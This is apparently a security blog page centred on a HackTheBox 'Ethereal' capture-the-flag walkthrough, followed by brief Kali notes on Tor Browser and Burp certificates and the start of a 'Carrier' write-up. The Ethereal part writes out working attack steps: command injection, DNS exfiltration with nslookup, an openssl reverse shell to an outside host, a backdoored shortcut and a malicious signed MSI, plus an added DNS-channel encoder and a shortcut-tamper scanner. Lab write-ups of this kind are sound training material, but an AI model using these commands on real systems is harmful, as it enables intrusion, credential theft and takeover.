FDISK: DOS/MBR boot sector, code offset 0x3c+2, OEM-ID "MSDOS5.0", root entries 224, sectors 2880 (volumes <=32 MB), sectors/FAT 9, sectors/track 18, serial number 0x5843af55, unlabeled, FAT (12 bit), followed by FAT

If we check the label of each disk image, only “FDISK” has one: “PASSWORDS”.

root@kali:~# e2label FDISK
e2label: Bad magic number in super-block while trying to open FDISK
FDISK contains a vfat file system labelled 'PASSWORDS'

To look inside, mount the image on a loop device. It contains a single directory “pbox”:

root@kali:~# mount -o loop FDISK /mnt/
root@kali:~# tree /mnt/
/mnt/
└── pbox
    ├── pbox.dat
    └── pbox.exe

1 directory, 2 files

We found an executable and a data file.
Spin up a Windows VM in VirtualBox and run pbox.exe there (wine didn’t work for me).

It asks for a password; the easily guessable “password” opens it.
Going through each entry in pbox, we can collect some interesting credentials.

List:

root@kali:~# cat strings.txt 
7oth3B@tC4v3!
alan@ethereal.co / P@ssword1!
alan2 / leaning!
watch3r
alan / Ex3cutiv3Backups
R3lea5eR3@dy#
Password8
!C414m17y57r1k3s4g41n!
alan53 / Ch3ck1ToU7

Trying each pair, the following credential logs in to ethereal.htb:8080:

alan:!C414m17y57r1k3s4g41n!


The form appears to run the “ping” command internally.
So try OS command injection by appending a Windows command in the text box and submitting.
The injected command runs: the box pings us.

127.0.0.1 & ping 10.10.14.23

We can confirm it with tcpdump:

root@kali:~# tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
18:51:03.070436 IP ethereal.htb > kali: ICMP echo request, id 1, seq 17, length 40
18:51:03.070476 IP kali > ethereal.htb: ICMP echo reply, id 1, seq 17, length 40
18:51:04.222480 IP ethereal.htb > kali: ICMP echo request, id 1, seq 18, length 40
18:51:04.222522 IP kali > ethereal.htb: ICMP echo reply, id 1, seq 18, length 40
18:51:05.231877 IP ethereal.htb > kali: ICMP echo request, id 1, seq 19, length 40
18:51:05.231910 IP kali > ethereal.htb: ICMP echo reply, id 1, seq 19, length 40
18:51:06.875927 IP ethereal.htb > kali: ICMP echo request, id 1, seq 20, length 40
18:51:06.875966 IP kali > ethereal.htb: ICMP echo reply, id 1, seq 20, length 40

To get data out, we can make the box resolve names through our machine: inject an nslookup against our IP and run Responder, which answers the query and logs the requested name.

127.0.0.1 & nslookup test 10.10.14.23
root@kali:~# responder -I tun0

~~~

[+] Listening for events...
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .test

We can execute a command and leak its output one whitespace-separated token per DNS query with a for /f loop:

# 10.10.14.23 & for /f %i in ('whoami') do nslookup %i 10.10.14.23
[+] Listening for events...
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .etherealalan

From here we can enumerate blind through DNS. For example, the current directory is “C:\windows\system32\inetsrv” (note that the colon and backslashes do not survive the channel):

# 10.10.14.23 & for /f %i in ('cd') do nslookup %i 10.10.14.23
[+] Listening for events...
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .c.windowssystem32inetsrv
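The receiving side of this channel is just Responder’s log. The script below is an added example, not from the original writeup: it parses constructed log lines in the format Responder printed above back into the original text, and, going beyond what the page does, shows a lossless variant of the same DNS channel that hex-encodes the output into sequence-numbered labels of at most 63 characters (the RFC 1035 label limit), so backslashes, colons and line order survive even when queries arrive shuffled or are retried. The Windows-side one-liner to produce those hex labels is not shown here; only the encoding rule and the decoder are.

```python
import re

# Constructed sample of Responder's DNS output, in the format shown on this page.
SAMPLE_LOG = """\
[+] Listening for events...
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Rule.Name.Allow.ICMP.Reply
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Rule.Name.Allow.UDP.Port.53
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .c.windowssystem32inetsrv
"""

NAME_RE = re.compile(r"Requested name:\s+(\S+)")
MAX_LABEL = 63  # RFC 1035: a single DNS label is at most 63 octets


def requested_names(log_text):
    """Pull every looked-up name out of Responder's log, minus the leading dot."""
    return [m.group(1).strip(".") for m in NAME_RE.finditer(log_text)]


def tokens_to_line(name):
    """Undo the 'tokens=1,2,...' nslookup trick: each dot was a space in the original line."""
    return name.replace(".", " ")


def encode_lossless(text, seq_width=4):
    """
    Hex-encode arbitrary command output into DNS-safe labels.
    Hex survives case folding (resolvers may 0x20-randomise names) and carries
    characters the raw-token channel drops (':' and '\\' above). Each label gets
    a sequence prefix so order can be restored if queries arrive shuffled.
    """
    hexed = text.encode().hex()
    body = MAX_LABEL - seq_width - 1          # room for the "NNNN-" prefix
    return [f"{i:0{seq_width}d}-{hexed[j:j + body]}"
            for i, j in enumerate(range(0, len(hexed), body))]


def decode_lossless(labels):
    """Reassemble labels from encode_lossless(), tolerating reordering and retries."""
    parts = {}
    for label in labels:
        seq, chunk = label.split("-", 1)
        parts[int(seq)] = chunk               # duplicates (DNS retries) collapse here
    return bytes.fromhex("".join(parts[k] for k in sorted(parts))).decode()


if __name__ == "__main__":
    for name in requested_names(SAMPLE_LOG):
        print(tokens_to_line(name))
    labels = encode_lossless("C:\\windows\\system32\\inetsrv\n")
    print(labels)
    print(decode_lossless(labels), end="")
```

On the defensive side the same parser is a detection hint: a host issuing a burst of queries whose leftmost label looks like command output (or like hex of a fixed width) against a resolver it does not normally use is exactly what this channel looks like in DNS logs.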

User enumeration:

# 10.10.14.23 & for /f %i in ('dir /B "C:\Users"') do nslookup %i 10.10.14.23
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Administrator
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .alan
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .jorge
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Public
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .rupal

Installed Program enumeration:

# 10.10.14.23 & for /f %i in ('dir /B "C:\Program Files (x86)"') do nslookup %i 10.10.14.23
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Common
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Internet
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Microsoft
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Microsoft
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Microsoft.NET
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .MSBuild
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .OpenSSL.v1.1.0
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Reference
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Windows
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Windows
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Windows
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Windows
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Windows
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Windows
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Windows
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .WindowsPowerShell

Notably, OpenSSL v1.1.0 is installed, which gives us a TLS client binary on the box to build a reverse shell with. Next, dump the firewall rules to a file and read them back; rule names contain spaces, so the multi-token form of the for /f loop is needed:

# 10.10.14.23 & netsh advfirewall firewall show rule name=all | findstr "Rule Name:" > C:\Users\Public\Desktop\Shortcuts\fw.txt
# 10.10.14.23 & for /f %i in ('dir /B "C:\Users\Public\Desktop\Shortcuts"') do nslookup %i 10.10.14.23
# 10.10.14.23 & for /f "tokens=1,2,3,4,5,6,7,8" %a in ('type C:\users\public\desktop\shortcuts\fw.txt') do nslookup %a.%b.%c.%d.%e.%f.%g.%h 10.10.14.23
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Rule.Name.Allow.ICMP.Reply
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Rule.Name.Allow.ICMP.Request
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Rule.Name.Allow.UDP.Port.53
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Rule.Name.Allow.TCP.Ports.73.136
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Rule.Name.Allow.Port.80.8080
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Rule.Name.Allow.ICMP.Request
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Rule.Name.Allow.ICMP.Reply

According to these rules, two TCP ports are allowed: 73 and 136. We use them for an encrypted reverse shell with the installed openssl.exe.
First generate a self-signed certificate for our openssl s_server listeners:

root@kali:~# openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
Generating a RSA private key
.................................................................................................................................++++
..........................++++
writing new private key to 'key.pem'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:
root@kali:~# ls -la 
-rw-r--r-- 1 root root 1939 Mar 10 13:25 cert.pem
-rw------- 1 root root 3272 Mar 10 13:24 key.pem
# 10.10.14.23 | "C:\Program Files (x86)\OpenSSL-v1.1.0\bin\openssl.exe" s_client -quiet -connect 10.10.14.23:73 | cmd.exe | "C:\Program Files (x86)\OpenSSL-v1.1.0\bin\openssl.exe" s_client -quiet -connect 10.10.14.23:136

root@kali:~# openssl s_server -quiet -key key.pem -cert cert.pem -port 73

Pinging 10.10.14.23 with 32 bytes of data:
Reply from 10.10.14.23: bytes=32 time=34ms TTL=63
Reply from 10.10.14.23: bytes=32 time=38ms TTL=63

Ping statistics for 10.10.14.23:
    Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 34ms, Maximum = 38ms, Average = 36ms

root@kali:~# openssl s_server -quiet -key key.pem -cert cert.pem -port 136
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>

After that, by typing a command into the openssl server listening on port 73 and refreshing the page, we can execute our commands.

 Directory of C:\users\alan\desktop

07/07/2018  11:08 PM    <DIR>          .
07/07/2018  11:08 PM    <DIR>          ..
07/07/2018  11:07 PM               160 note-draft.txt
               1 File(s)            160 bytes
               2 Dir(s)  15,437,340,672 bytes free
 Volume in drive C has no label.
 Volume Serial Number is FAD9-1FD5

There is no user.txt in C:\Users\alan\desktop.
However, there is an interesting text file.

c:\windows\system32\inetsrv>type C:\users\alan\desktop\note-draft.txt
I've created a shortcut for VS on the Public Desktop to ensure we use the same version. Please delete any existing shortcuts and use this one instead.

- Alan

c:\windows\system32\inetsrv>dir C:\users\public\desktop\shortcuts
 Volume in drive C has no label.
 Volume Serial Number is FAD9-1FD5

 Directory of C:\users\public\desktop\shortcuts

03/10/2019  11:01 AM    <DIR>          .
03/10/2019  11:01 AM    <DIR>          ..
03/10/2019  11:02 AM             2,494 fw.txt
07/06/2018  02:28 PM             6,125 Visual Studio 2017.lnk
               2 File(s)          8,619 bytes
               2 Dir(s)  15,436,517,376 bytes free

To take advantage of this, we create a payload shortcut that gives us a shell as another user. We can use LNKUp for that.

root@kali:~/LNKUp# python generate.py --host localhost --type ntlm --out vs-mod.lnk --execute "C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.23:73|cmd.exe|C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.23:136"
\
  ~==================================================~
##                                                    ##
##  /$$       /$$   /$$ /$$   /$$ /$$   /$$           ##
## | $$      | $$$ | $$| $$  /$$/| $$  | $$           ##
## | $$      | $$$$| $$| $$ /$$/ | $$  | $$  /$$$$$$  ##
## | $$      | $$ $$ $$| $$$$$/  | $$  | $$ /$$__  $$ ##
## | $$      | $$  $$$$| $$  $$  | $$  | $$| $$  \ $$ ##
## | $$      | $$\  $$$| $$\  $$ | $$  | $$| $$  | $$ ##
## | $$$$$$$$| $$ \  $$| $$ \  $$|  $$$$$$/| $$$$$$$/ ##
## |________/|__/  \__/|__/  \__/ \______/ | $$____/  ##
##                                         | $$       ##
##                                         | $$       ##
##                                         |__/       ##
  ~==================================================~

File saved to /root/LNKUp/vs-mod.lnk
Link created at vs-mod.lnk with UNC path \\localhost\Share\3910.ico.

After that, run the SSL server again, this time serving vs-mod.lnk.
It prints nothing to the console, but that is expected.

root@kali:~# openssl s_server -quiet -key key.pem -cert cert.pem -port 136 < vs-mod.lnk
# then, submit the following payload in the web ping console to upload the shortcut
# 10.10.14.23 | "C:\Program Files (x86)\OpenSSL-v1.1.0\bin\openssl.exe" s_client -quiet -connect 10.10.14.23:136 > "C:\Users\Public\Desktop\Shortcuts\vs-mod.lnk"

After that, we can confirm that vs-mod.lnk is in the Shortcuts directory.

c:\windows\system32\inetsrv>dir c:\users\public\desktop\shortcuts
 Volume in drive C has no label.
 Volume Serial Number is FAD9-1FD5

 Directory of c:\users\public\desktop\shortcuts

03/10/2019  12:28 PM    <DIR>          .
03/10/2019  12:28 PM    <DIR>          ..
03/10/2019  11:02 AM             2,494 fw.txt
07/06/2018  02:28 PM             6,125 Visual Studio 2017.lnk
03/10/2019  12:26 PM               520 vs-mod.lnk
               3 File(s)          9,139 bytes
               2 Dir(s)  15,435,431,936 bytes free

Then, replace “Visual Studio 2017.lnk” with a copy of “vs-mod.lnk”:

# type this command into the openssl server listening on port 73
del "c:\users\public\desktop\shortcuts\Visual Studio 2017.lnk" & copy /Y "c:\users\public\desktop\shortcuts\vs-mod.lnk" "c:\users\public\desktop\shortcuts\Visual Studio 2017.lnk" & dir c:\users\public\desktop\shortcuts

c:\windows\system32\inetsrv>dir c:\users\public\desktop\shortcuts
 Volume in drive C has no label.
 Volume Serial Number is FAD9-1FD5

 Directory of c:\users\public\desktop\shortcuts

03/10/2019  12:39 PM    <DIR>          .
03/10/2019  12:39 PM    <DIR>          ..
03/10/2019  11:02 AM             2,494 fw.txt
03/10/2019  12:26 PM               520 Visual Studio 2017.lnk
03/10/2019  12:26 PM               520 vs-mod.lnk
               3 File(s)          3,534 bytes
               2 Dir(s)  15,435,128,832 bytes free

After that, immediately restart both servers.
A few minutes later, we get a user shell as “jorge”.
As always, user.txt is in the “desktop” directory.

root@kali:~# openssl s_server -quiet -key key.pem -cert cert.pem -port 136
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\jorge\Documents>whoami
whoami
ethereal\jorge

C:\Users\jorge\Documents>type C:\Users\jorge\desktop\user.txt
2b9a4ca09408b4a39d87cbcd7bd524dd
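A detection-side counterpart to the shortcut tampering above, as an added example that is not part of this write-up or of LNKUp: a minimal reader for the Shell Link (.lnk) binary format that pulls out the target path and command-line arguments, plus a check that flags shortcuts whose arguments launch cmd.exe or a networking tool. The sample shortcuts are constructed in the code (the build_lnk helper exists only to produce test input; the marker list and the TEST-NET address 192.0.2.10 are assumptions).

```python
"""Scan Windows shortcut (.lnk) files for tampered command lines.

Added example for this write-up (not part of the original post or of LNKUp).
Implements a minimal reader for the Shell Link binary format (MS-SHLLINK):
the 76-byte header, the optional LinkTargetIDList and LinkInfo blocks, and
the StringData fields that carry the relative target path and the command
line arguments. The sample shortcuts at the bottom are constructed here.
"""
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80

# Substrings an IDE shortcut should never carry in its target or arguments
# (assumed marker list; tune it for the environment).
SUSPICIOUS_MARKERS = ("cmd.exe", "powershell", "s_client", "nc.exe", "|")


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a .lnk file as a dict."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a shell link: bad HeaderSize")
    if data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link: bad CLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76
    if flags & HAS_ID_LIST:
        # IDListSize (2 bytes) followed by the item ID list itself
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:
        # LinkInfoSize is the first DWORD of the LinkInfo structure
        pos += struct.unpack_from("<I", data, pos)[0]

    def read_string() -> str:
        nonlocal pos
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + width * count]
        pos += width * count
        return raw.decode("utf-16-le" if width == 2 else "cp1252", errors="replace")

    fields = {}
    # StringData fields appear in this fixed order when their flag is set
    for bit, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if flags & bit:
            fields[name] = read_string()
    return fields


def suspicious_markers(fields: dict) -> list:
    """Markers found in the shortcut's target path or arguments (empty = looks clean)."""
    text = " ".join(fields.get(k, "") for k in ("relative_path", "arguments")).lower()
    return [m for m in SUSPICIOUS_MARKERS if m in text]


def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Build a minimal Unicode shortcut carrying only a relative path and arguments.

    Only used here to construct sample input for the scanner.
    """
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)  # ShowCommand = SW_SHOWNORMAL

    def field(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + field(relative_path) + field(arguments)


# Constructed samples: an ordinary IDE shortcut and one whose arguments pipe a
# TLS session from 192.0.2.10 (TEST-NET placeholder address) into cmd.exe.
BENIGN = build_lnk(r"..\..\Program Files (x86)\Microsoft Visual Studio\devenv.exe", "")
TAMPERED = build_lnk(r"..\..\Windows\System32\cmd.exe",
                     "/c openssl.exe s_client -quiet -connect 192.0.2.10:73 | cmd.exe")


def scan(samples: dict) -> dict:
    """Map each sample name to the markers found in it."""
    return {name: suspicious_markers(parse_lnk(blob)) for name, blob in samples.items()}


if __name__ == "__main__":
    for name, hits in scan({"benign": BENIGN, "tampered": TAMPERED}).items():
        print(f"{name}: {'SUSPICIOUS ' + ', '.join(hits) if hits else 'ok'}")
```

Run as a scheduled scan over shared shortcut folders (C:\Users\Public\Desktop\Shortcuts on this box is exactly the kind of location to watch). A real deployment would also compare each file's size and hash against the known-good shortcut: the replaced link here shrank from 6,125 to 520 bytes, which is a cheap signal on its own.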

3. Getting Root

If we check the other drives on Ethereal, we find an additional drive “D:”.

C:\Users\jorge\Documents>fsutil fsinfo drives

Drives: C:\ D:\

C:\Users\jorge\Documents>dir D:\
 Volume in drive D is Development
 Volume Serial Number is 54E5-37D1

 Directory of D:\

07/07/2018  09:50 PM    <DIR>          Certs
06/27/2018  10:30 PM    <DIR>          DEV
07/16/2018  09:54 PM    <DIR>          Program Files (x86)
06/30/2018  09:05 PM    <DIR>          ProgramData
               0 File(s)              0 bytes
               4 Dir(s)   8,437,514,240 bytes free

We can find an interesting note in D:\DEV\MSIs.

C:\Users\jorge\Documents>type D:\DEV\MSIs\note.txt
Please drop MSIs that need testing into this folder - I will review regularly. Certs have been added to the store already.

- Rupal

It sounds like we have to create an MSI file that executes our payload.
Beforehand, we need certificates to sign the MSI file.
We can find them in D:\Certs.

C:\Users\jorge\Documents>dir D:\certs
 Volume in drive D is Development
 Volume Serial Number is 54E5-37D1

 Directory of D:\certs

07/07/2018  09:50 PM    <DIR>          .
07/07/2018  09:50 PM    <DIR>          ..
07/01/2018  09:26 PM               772 MyCA.cer
07/01/2018  09:26 PM             1,196 MyCA.pvk
               2 File(s)          1,968 bytes
               2 Dir(s)   8,437,514,240 bytes free

C:\Users\jorge\Documents>C:\progra~2\OpenSSL-v1.1.0\bin\openssl.exe base64 -in D:\Certs\MyCA.cer
[base64 output omitted]

C:\Users\jorge\Documents>C:\progra~2\OpenSSL-v1.1.0\bin\openssl.exe base64 -in D:\Certs\MyCA.pvk
[base64 output omitted]

Create an MSI file

We can use the WiX Toolset to create a new MSI file.
First, we have to prepare an XML (.wxs) file that describes the MSI we are creating.

root@kali:~# cat ethereal.wxs 
<?xml version="1.0"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
  <Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name"
           Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
    <Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
    <Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>
    <Directory Id="TARGETDIR" Name="SourceDir">
      <Directory Id="ProgramFilesFolder">
        <Directory Id="INSTALLLOCATION" Name="Example">
          <Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
          </Component>
        </Directory>
      </Directory>
    </Directory>
    <Feature Id="DefaultFeature" Level="1">
      <ComponentRef Id="ApplicationFiles"/>
    </Feature>
    <Property Id="cmdline">cmd.exe /C "c:\users\public\desktop\shortcuts\vs-mod.lnk"</Property>
    <CustomAction Id="Stage1" Execute="deferred" Directory="TARGETDIR" ExeCommand='[cmdline]' Return="ignore"
                  Impersonate="yes"/>
    <CustomAction Id="Stage2" Execute="deferred" Script="vbscript" Return="check">
    </CustomAction>
    <InstallExecuteSequence>
      <Custom Action="Stage1" After="InstallInitialize"></Custom>
      <Custom Action="Stage2" Before="InstallFiles"></Custom>
    </InstallExecuteSequence>
  </Product>
</Wix>

Then, we execute the following commands.
The resulting “ethereal.msi” is written to the directory “C:\Program Files\WiX Toolset v3.11\bin”.

C:\Program Files\WiX Toolset v3.11\bin>candle.exe c:\tmp\ethereal.wxs
Windows Installer XML Toolset Compiler version 3.11.1.2318
Copyright (c) .NET Foundation and contributors. All rights reserved.

ethereal.wxs


C:\Program Files\WiX Toolset v3.11\bin>light.exe ethereal.wixobj
Windows Installer XML Toolset Linker version 3.11.1.2318
Copyright (c) .NET Foundation and contributors. All rights reserved.


c:\tmp\ethereal.wxs(6) : warning LGHT1079 : The cabinet 'product.cab' does not contain any files.  If this installation contains no files, this warning can likely be safely ignored.  Otherwise, please add files to the cabinet or remove it.
c:\tmp\ethereal.wxs(10) : error LGHT0204 : ICE18: KeyPath for Component: 'ApplicationFiles' is Directory: 'INSTALLLOCATION'. The Directory/Component pair must be listed in the CreateFolders table.

Sign the MSI file

First, we have to install the Windows SDK.
Then, we have to decode the base64-encoded .cer and .pvk files.
Decode MyCA.cer:

root@kali:~# cat MyCA.cer.b64
[base64 content omitted]
root@kali:~# base64 -d MyCA.cer.b64 > MyCA.cer

Decode MyCA.pvk:

root@kali:~# cat MyCA.pvk.b64
[base64 content omitted]
root@kali:~# base64 -d MyCA.pvk.b64 > MyCA.pvk

Next, we create the .cer and .pfx files used for the signature.

C:\Program Files\Microsoft SDKs\Windows\v7.1\Bin>makecert.exe -n "CN=Ethereal" -pe -cy end -ic c:\tmp\MyCA.cer -iv c:\tmp\MyCA.pvk -sky signature -sv c:\tmp\ethereal.pvk c:\tmp\ethereal.cer

makecert.exe prompts for a password, but we can leave it empty and click “OK”.

Then, execute the following commands.

C:\Program Files\Microsoft SDKs\Windows\v7.1\Bin>pvk2pfx.exe -pvk c:\tmp\ethereal.pvk -spc c:\tmp\ethereal.cer -pfx c:\tmp\ethereal.pfx

C:\Program Files\Microsoft SDKs\Windows\v7.1\Bin>signtool.exe sign /f c:\tmp\ethereal.pfx c:\tmp\ethereal.msi
Done Adding Additional Store
Successfully signed: c:\tmp\ethereal.msi

After that, we have to upload the MSI file. We can do this the same way we uploaded vs-mod.lnk.

C:\Users\jorge\Documents>copy c:\users\public\desktop\shortcuts\ethereal.msi d:\dev\msis\ethereal.msi & dir d:\dev\msis
        1 file(s) copied.
 Volume in drive D is Development
 Volume Serial Number is 54E5-37D1

 Directory of d:\dev\msis

03/21/2019  11:25 AM    <DIR>          .
03/21/2019  11:25 AM    <DIR>          ..
03/21/2019  10:34 AM           663,552 ethereal.msi
07/18/2018  09:47 PM               133 note.txt
               2 File(s)        663,685 bytes
               2 Dir(s)   8,436,850,688 bytes free

All that is left is to rerun the SSL servers and wait a couple of minutes.
After that, someone executes the uploaded MSI and we get a root shell.

root@kali:~# openssl s_server -quiet -key key.pem -cert cert.pem -port 136
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\>whoami
ethereal\rupal

C:\>dir c:\users\rupal\desktop
 Volume in drive C has no label.
 Volume Serial Number is FAD9-1FD5

 Directory of c:\users\rupal\desktop

10/10/2018  05:16    <DIR>          .
10/10/2018  05:16    <DIR>          ..
04/07/2018  22:01                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  15,406,366,720 bytes free

C:\>type c:\users\rupal\desktop\root.txt
1cb6f1fc220e3f2fcc0e3cd8e2d9906f

Installing Tor browser on Kali linux 2019.01

Environment

  • OS: Kali linux 2019.1

Explanation

How to install Tor Browser on Kali Linux (not manually).
If we install Tor Browser manually, it runs as the root user.
Besides, a manual install is harder to maintain.

Solution

Just one simple apt-get is enough.

sudo apt-get install tor torbrowser-launcher

Setting up Burpsuite for HTTPS on Kali linux 2019.01

Environment

  • OS: Kali linux 2019.1
  • Burp Suite: Burp Suite Community Edition v1.7.36
  • Chrome: Version 73.0.3683.75

Explanation

How to install the Burp CA certificate in Chrome.
I have done this more than five times and still forget, so I took this memo.

Solution

1. SSL Error

Without any configuration, using Burp with HTTPS makes the browser show this certificate error.

2. Download SSL cert

By opening the Burp page on localhost, we can download the certificate “cacert.der”.
We have to click the “CA Certificate” button.

3. Register the cert on google chrome

Go to Settings and click “Advanced”. There is a menu entry “Manage certificates”.

Click “Authorities”, then “Import”.
After selecting the downloaded “cacert.der”, it shows some options.

Choosing only the first one, “Trust this certificate for identifying websites”, is enough.

4. Restart

Then restart Chrome and it should work.

5. If the same error still appears

In this case, we can check the validity of the certificate under “Manage certificates”.
Click on “org-PortSwigger”; the certificate may be shown as “untrusted”.

We can edit the certificate, or delete it and import it again.

Hackthebox Carrier Writeup


Explanation

Hackthebox is a website which has a bunch of vulnerable machines in its own VPN. This is a write-up of machine “Carrier” on that website.

Solution

1. Initial Enumeration

Port Scanning:

root@kali:~# nmap -p- 10.10.10.105 -sV -sC
Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-23 09:22 EEST
Nmap scan report for 10.10.10.105
Host is up (0.037s latency).
Not shown: 65532 closed ports
PORT   STATE    SERVICE VERSION
21/tcp filtered ftp
22/tcp open     ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 15:a4:28:77:ee:13:07:06:34:09:86:fd:6f:cc:4c:e2 (RSA)
|   256 37:be:de:07:0f:10:bb:2b:b5:85:f7:9d:92:5e:83:25 (ECDSA)
|_  256 89:5a:ee:1c:22:02:d2:13:40:f2:45:2e:70:45:b0:c4 (ED25519)
80/tcp open     http    Apache httpd 2.4.18 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Login
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.14 seconds

Gobuster HTTP:

root@kali:~# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,204,301,302,403' -u http://10.10.10.105/ -x .php

=====================================================
Gobuster v2.0.0              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.105/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,403
[+] Extensions   : php
[+] Timeout      : 10s
=====================================================
2018/09/23 09:56:07 Starting gobuster
=====================================================
/index.php (Status: 200)
/img (Status: 301)
/tools (Status: 301)
/doc (Status: 301)
/css (Status: 301)
/js (Status: 301)
/tickets.php (Status: 302)
/fonts (Status: 301)
/dashboard.php (Status: 302)
/debug (Status: 301)
/diag.php (Status: 302)
/server-status (Status: 403)
=====================================================
2018/09/23 10:27:10 Finished
=====================================================

UDP Scanning:

root@kali:~# nmap -sU 10.10.10.105 --top-ports 1000 -sV -sC
Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-23 18:55 EEST
Nmap scan report for 10.10.10.105
Host is up (0.037s latency).
Not shown: 998 closed ports
PORT    STATE         SERVICE VERSION
67/udp  open|filtered dhcps
161/udp open          snmp    SNMPv1 server; pysnmp SNMPv3 server (public)
| snmp-info: 
|   enterprise: pysnmp
|   engineIDFormat: octets
|   engineIDData: 77656201ec7908
|   snmpEngineBoots: 2
|_  snmpEngineTime: 3h09m02s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1185.70 seconds

SNMP enumeration:

